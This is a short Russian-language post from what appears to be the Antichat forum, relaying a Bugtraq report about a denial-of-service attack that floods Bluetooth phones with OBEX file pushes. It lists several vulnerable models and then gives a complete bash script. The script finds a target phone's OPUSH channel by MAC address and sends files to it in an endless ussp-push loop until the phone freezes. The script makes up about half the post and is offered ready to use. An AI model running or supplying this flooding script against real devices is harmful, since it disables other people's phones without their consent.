Форум АНТИЧАТ - Найдена возможность DoS атаки на сотовые телефоны с Bluetooth

В списке рассылки Bugtraq опубликовано сообщение, суть которого - в возможности проведения DoS-атаки против ряда сотовых телефонов при помощи множественных посылок файлов с использование ПО ussp-push.

При использовании атаки телефон жертвы начинает выдавать множество сообщений, требующих получить, либо отвергнуть передаваемые файлы. Так как скорость передачи достаточно высока, через определённое время телефон попросту зависает, не давая, в том числе, отключить Bluetooth. В качестве уязвимых сотовых телефонов называются следующие модели: Sony Ericsson K700i, Nokia N70, Motorola MOTORAZR V3, Sony Ericsson W810i, LG Chocolate KG800, хотя автор утверждает об уязвимости практически всех телефонов с поддержкой Bluetooth. Используя простейший Bluetooth-донгл удалось одновременно проводить атаку на 3 телефона. Приводится текст скрипта, задав которому в качестве параметра MAC-адрес обнаруженного телефона, можно провести атак.

Код:

#!/bin/bash



checkOPUSH()

{

MAC=$1

OCHAN=$(sdptool search --bdaddr $MAC OPUSH | grep Channel:)

if test "$OCHAN" != ""

then

OCHAN=$(echo $OCHAN | awk '/Channel:/ { print $2 }')

return $OCHAN

fi

return 0

}



if test $# -ne 2

then

echo "Usage: $0 <bdaddr> <filename>"

exit 127

fi



MAC=$1

FILENAME=$2



checkOPUSH $1

OCHAN=$?



if test $OCHAN -eq 0

then

echo "Couldn't connect to $MAC via OBEX push."

exit 127

fi



while true

do

./ussp-push $MAC@$OCHAN $FILENAME $FILENAME

done

(с)лито